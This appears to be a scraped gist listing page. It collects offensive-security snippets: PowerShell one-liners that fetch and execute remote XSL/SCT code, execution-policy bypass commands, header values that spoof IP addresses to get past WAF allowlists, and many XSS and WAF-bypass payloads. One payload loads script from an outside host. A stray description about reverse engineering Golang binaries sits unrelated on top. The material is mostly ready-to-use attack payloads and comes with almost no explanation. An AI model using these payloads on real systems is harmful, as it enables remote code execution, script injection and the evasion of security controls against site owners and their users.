Some notes, tools, and techniques for reverse engineering Golang binaries.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <Psapi.h> | |
#include <metahost.h> | |
#include <comutil.h> | |
#include <mscoree.h> | |
#include "patch_info.h" | |
#include "base\helpers.h" | |
/** | |
* For the debug build we want: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################################################## | |
### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
### [https://twitter.com/bohops/status/966172175555284992] | |
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
############################################################################## | |
### Powershell VBScript Assembly SCT "Fetch & Execute" | |
### [https://twitter.com/bohops/status/965670898379476993] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ | |
powershell.exe -ExecutionPolicy Bypass | |
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 | |
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1 | |
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1 | |
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile - | |
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA | |
Set-ExecutionPolicy Bypass -Scope Process |
<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CACHE_INFO: 127.0.0.1 | |
CF_CONNECTING_IP: 127.0.0.1 | |
CF-Connecting-IP: 127.0.0.1 | |
CLIENT_IP: 127.0.0.1 | |
Client-IP: 127.0.0.1 | |
COMING_FROM: 127.0.0.1 | |
CONNECT_VIA_IP: 127.0.0.1 | |
FORWARD_FOR: 127.0.0.1 | |
FORWARD-FOR: 127.0.0.1 | |
FORWARDED_FOR_IP: 127.0.0.1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- X-forwarded-for | |
- X-remote-IP | |
- X-originating-IP | |
- x-remote-addr | |
waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip | |
如: | |
X-Forwarded-For: 127.0.0.1 | |
X-Remote-Ip: 127.0.0.1 | |
X-Originating-Ip: 127.0.0.1 | |
X-Remote-Addr: 127.0.0.1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@vanshitmalhotra | Bypass AWS WAF -// | |
Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
eg: <!<script>confirm(1)</script> | |
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
<img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
DotDefender WAF bypass by @0xInfection | |
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
NewerOlder